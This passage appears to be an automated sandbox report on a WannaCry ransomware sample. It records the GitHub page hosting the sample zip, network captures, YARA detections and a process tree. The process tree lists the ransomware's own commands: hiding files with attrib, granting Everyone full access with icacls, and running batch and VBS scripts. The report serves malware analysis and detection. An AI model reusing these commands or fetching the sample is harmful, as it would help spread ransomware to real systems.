                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:48:01 UTC1663OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      2024-03-23 14:48:01 UTC580INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:48:01 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.095420
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: E1A4:1046CB:2F8B75:777E86:65FEEBA1
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      165192.168.2.164988840.68.123.157443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:48:09 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=W+gOxC5MR2PNrAs&MD=WW3wwygw HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                      Host: slscr.update.microsoft.com
                                                                                      2024-03-23 14:48:10 UTC560INHTTP/1.1 200 OK
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/octet-stream
                                                                                      Expires: -1
                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                      MS-CorrelationId: 106adcc0-4b36-40a5-8738-cd18a70584d5
                                                                                      MS-RequestId: 84be3b95-9eb3-4318-b97e-73017c8f4361
                                                                                      MS-CV: JbOULhivj0K5A+UZ.0
                                                                                      X-Microsoft-SLSClientCache: 2160
                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Date: Sat, 23 Mar 2024 14:48:09 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 25457
                                                                                      2024-03-23 14:48:10 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                      2024-03-23 14:48:10 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      166192.168.2.164990320.42.72.131443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:52:02 UTC828OUTPOST /OneCollector/1.0/ HTTP/1.1
                                                                                      Accept: */*
                                                                                      APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                      AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEApwChWQq5lNmBKsEPWGpnTgALtq6cu/9Dlxsars2jaiEPTBfZ1quoJbcAwU8Txaa8q3M1HduY4uLm+fCw8/qqsWP12ZUjUg7jK/RADXyVTCS49Jp/bOkotugNvMLEhFQWKroL6wTlvyng19/rY4p0GnonDOuwK1985i5xy4VbGZmqShzB9JWOn//Nn9jTG8fCy74/dR0vdzR9b3S6M2QnDehkJzz6WScdv103BPiylwOU0KubJRggyyddYCzzL6HvnUNKXvoIX+E4S+NgNS+6vR1WSTXxQJG89QgTb4nWlKoLIU4nqqAwUmlb93DzHEGNgbHQE=&p=
                                                                                      Client-Id: NO_AUTH
                                                                                      Content-Encoding: deflate
                                                                                      Content-Type: application/bond-compact-binary
                                                                                      Expect: 100-continue
                                                                                      SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                      Upload-Time: 1711205520300
                                                                                      Host: self.events.data.microsoft.com
                                                                                      Content-Length: 8079
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-03-23 14:52:02 UTC8079OUTData Raw: ed 7c 4b cc 5c 47 76 5e eb 61 85 a2 28 8a 23 69 34 92 46 1e d1 84 66 32 f2 74 ff a9 f7 a3 11 c3 43 f1 a7 46 1c 8b 43 85 3f f5 88 01 83 b9 dd 7d bb ff 4b f6 df b7 d5 0f 3e 04 2f 84 09 60 c0 09 1c 87 13 04 08 0c 2f 06 06 12 58 40 12 64 91 04 49 90 85 17 59 64 c2 6c 92 2c e3 45 b2 c8 26 2b 23 2f 20 70 16 f9 4e dd 57 75 f1 17 67 3c 18 08 1e 80 04 08 f2 54 d5 ad aa 5b 75 ce 77 be 73 aa fa be f9 84 dc 63 97 d4 95 e9 b4 18 e7 d7 0f ee ae 37 f9 51 fd cf 3b 79 36 df 1c 5e ce 37 d9 24 db 64 fb f9 2d b4 b8 50 2e d6 e5 bc 40 41 3e f9 f8 07 ff f3 5f fc ee 5f ff 8f 7f ff 8f bf f4 d9 b9 72 38 9e 38 69 8c 30 86 f3 b1 1a 67 59 e6 a6 63 3d 12 b9 15 2e cf 1d 9f fc 87 a7 be ff e4 fd 2f 9f 7c ac 38 f5 c1 e5 db d9 2a ef 9f bd b4 18 ef fd f6 c9 4a 12 ac cf 7b f7 5f 3a f9 58 ef
                                                                                      Data Ascii: |K\Gv^a(#i4Ff2tCFC?}K>/`/X@dIYdl,E&+#/ pNWug<T[uwsc7Q;y6^7$d-P.@A>__r88i0gYc=./|8*J{_:X
                                                                                      2024-03-23 14:52:02 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-03-23 14:52:03 UTC443INHTTP/1.1 200 OK
                                                                                      Content-Length: 9
                                                                                      Content-Type: application/json
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      time-delta-millis: 2578
                                                                                      Access-Control-Allow-Headers: time-delta-millis
                                                                                      Access-Control-Allow-Methods: POST
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                      Date: Sat, 23 Mar 2024 14:52:02 GMT
                                                                                      Connection: close
                                                                                      {"acc":4}


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:15:47:17
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:1
                                                                                      Start time:15:47:18
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1968,i,18163136596310937086,2943385894762523011,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:5
                                                                                      Start time:15:47:33
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                      Imagebase:0x7ff7f5110000
                                                                                      File size:71'680 bytes
                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:15:47:47
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:3'514'368 bytes
                                                                                      MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000B.00000000.1406207775.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:12
                                                                                      Start time:15:47:48
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\attrib.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:attrib +h .
                                                                                      Imagebase:0xe80000
                                                                                      File size:19'456 bytes
                                                                                      MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:15:47:48
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:icacls . /grant Everyone:F /T /C /Q
                                                                                      Imagebase:0x1b0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:15:47:48
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:15
                                                                                      Start time:15:47:48
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:16
                                                                                      Start time:15:47:48
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 89%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:17
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:18
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c 58191711205328.bat
                                                                                      Imagebase:0xf20000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:19
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:20
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cscript.exe //nologo m.vbs
                                                                                      Imagebase:0x20000
                                                                                      File size:144'896 bytes
                                                                                      MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:21
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:22
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:23
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:24
                                                                                      Start time:15:47:49
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:25
                                                                                      Start time:15:47:50
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:26
                                                                                      Start time:15:47:50
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:27
                                                                                      Start time:15:47:50
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:28
                                                                                      Start time:15:47:50
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\dllhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                      Imagebase:0x7ff6e9610000
                                                                                      File size:21'312 bytes
                                                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:29
                                                                                      Start time:15:47:50
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:30
                                                                                      Start time:15:47:50
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:31
                                                                                      Start time:15:47:51
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:32
                                                                                      Start time:15:47:51
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:33
                                                                                      Start time:15:47:51
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:34
                                                                                      Start time:15:47:51
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:35
                                                                                      Start time:15:47:51
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:36
                                                                                      Start time:15:47:52
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:37
                                                                                      Start time:15:47:52
                                                                                      Start date:23/03/2024
